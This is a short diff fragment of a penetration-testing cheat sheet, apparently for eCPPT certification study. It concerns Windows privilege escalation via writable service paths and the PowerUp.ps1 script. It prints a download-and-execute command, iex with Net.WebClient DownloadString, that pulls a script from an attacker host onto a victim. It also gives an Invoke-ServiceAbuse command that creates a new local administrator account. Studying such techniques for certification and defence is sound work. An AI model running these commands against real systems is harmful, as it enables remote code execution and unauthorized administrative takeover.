sdhachem/eCPPT/cheatSheet/README.md

         For each service check if user can write in the service Path ==> icacls “Path”

     - Using powerUp.ps1 script in https://powersploit.readthedocs.io/en/latest/Privesc/
         - Import the script to the Victim in Powershell ==> iex (New-Object Net.WebClient).DownloadString('http://HackeIP/PowerUp.ps1')
+        - Import-Module .\Privesc
+        - Get-Command -Module Powerup
         - Run Invoke-AllChecks
         - Take note of the AbuseFunction (example : PriviligedService)
         - Use the PriviligedService to run any OS Command for example create new Admin user : Invoke-ServiceAbuse -Name PriviligedService  -UserName testUser -Password password_123 -LocalGroup "Administrators"